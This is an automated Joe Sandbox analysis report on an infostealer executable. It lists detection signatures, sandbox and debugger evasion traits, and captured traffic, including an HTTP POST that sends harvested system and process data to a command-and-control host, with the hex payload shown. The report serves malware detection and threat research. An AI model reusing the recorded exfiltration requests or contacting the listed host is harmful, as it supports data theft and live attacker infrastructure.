Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qZA8AyGxiA.exe

Overview

General Information

Sample name:qZA8AyGxiA.exe
renamed because original name is a hash value
Original sample name:75f83958dc211ddd4dfed631aed3aafa.exe
Analysis ID:1581233
MD5:75f83958dc211ddd4dfed631aed3aafa
SHA1:b47b4351e5be4bc3830ca73454ee8be8f4f32beb
SHA256:85b5d57cad412bcc5921e20d965120f850769b547fc9e63c2a0f1a18f12f7867
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • qZA8AyGxiA.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\qZA8AyGxiA.exe" MD5: 75F83958DC211DDD4DFED631AED3AAFA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: qZA8AyGxiA.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: qZA8AyGxiA.exeReversingLabs: Detection: 52%
Source: qZA8AyGxiA.exeVirustotal: Detection: 52%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: qZA8AyGxiA.exeJoe Sandbox ML: detected
Source: qZA8AyGxiA.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0090A5B0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0090A7F0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0090A7F0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0090A7F0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0090A7F0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0090A7F0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0090A7F0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0090B560
Source: qZA8AyGxiA.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_008A255D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008A29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 504434Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 31 35 36 34 37 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_0096A8C0 recvfrom,0_2_0096A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 504434Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 31 35 36 34 37 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:55:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:55:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: qZA8AyGxiA.exe, 00000000.00000003.2384933418.00000000019C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: qZA8AyGxiA.exe, 00000000.00000002.2405629426.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2384933418.00000000019C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4
Source: qZA8AyGxiA.exe, 00000000.00000002.2405843658.00000000019D5000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2383681749.00000000019D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: qZA8AyGxiA.exe, 00000000.00000002.2405629426.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2384933418.00000000019C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::3
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: qZA8AyGxiA.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: qZA8AyGxiA.exe, qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: qZA8AyGxiA.exe, 00000000.00000003.2275525344.00000000019F5000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724

System Summary

barindex
PE file contains section with special chars
Source: qZA8AyGxiA.exeStatic PE information: section name:
Source: qZA8AyGxiA.exeStatic PE information: section name: .idata
Source: qZA8AyGxiA.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008B05B00_2_008B05B0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008B6FA00_2_008B6FA0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_0096B1800_2_0096B180
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008DF1000_2_008DF100
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_009700E00_2_009700E0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C2E0500_2_00C2E050
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C2A0000_2_00C2A000
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_009062100_2_00906210
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_0096C3200_2_0096C320
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00BF44100_2_00BF4410
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_009704200_2_00970420
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008AE6200_2_008AE620
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C247800_2_00C24780
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_0090A7F00_2_0090A7F0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_0096C7700_2_0096C770
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C067300_2_00C06730
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_0095C9000_2_0095C900
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008B49400_2_008B4940
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008AA9600_2_008AA960
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00A76AC00_2_00A76AC0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00B5AAC00_2_00B5AAC0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C18BF00_2_00C18BF0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008ACBB00_2_008ACBB0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00B5AB2C0_2_00B5AB2C
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00A34B600_2_00A34B60
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C2CC900_2_00C2CC90
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C1CD800_2_00C1CD80
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C24D400_2_00C24D40
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00BBAE300_2_00BBAE30
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_0096EF900_2_0096EF90
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00968F900_2_00968F90
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00BF2F900_2_00BF2F90
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008C4F700_2_008C4F70
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008B10E60_2_008B10E6
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C0D4300_2_00C0D430
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C135B00_2_00C135B0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00BF56D00_2_00BF56D0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_00C317A00_2_00C317A0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008BCD40 appears 58 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 00A57220 appears 83 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008A75A0 appears 530 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008BCCD0 appears 50 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 00A7CBC0 appears 82 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008A73F0 appears 93 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008E50A0 appears 74 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008E4F40 appears 278 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008A71E0 appears 39 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008ACAA0 appears 60 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008E4FD0 appears 202 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 009844A0 appears 50 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008E5340 appears 34 times
Source: qZA8AyGxiA.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: qZA8AyGxiA.exeStatic PE information: Section: lyhwrnys ZLIB complexity 0.9945647912601059
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_008A255D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008A29FF
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: qZA8AyGxiA.exeReversingLabs: Detection: 52%
Source: qZA8AyGxiA.exeVirustotal: Detection: 52%
Source: qZA8AyGxiA.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: qZA8AyGxiA.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: rsaenh.dllJump to behavior
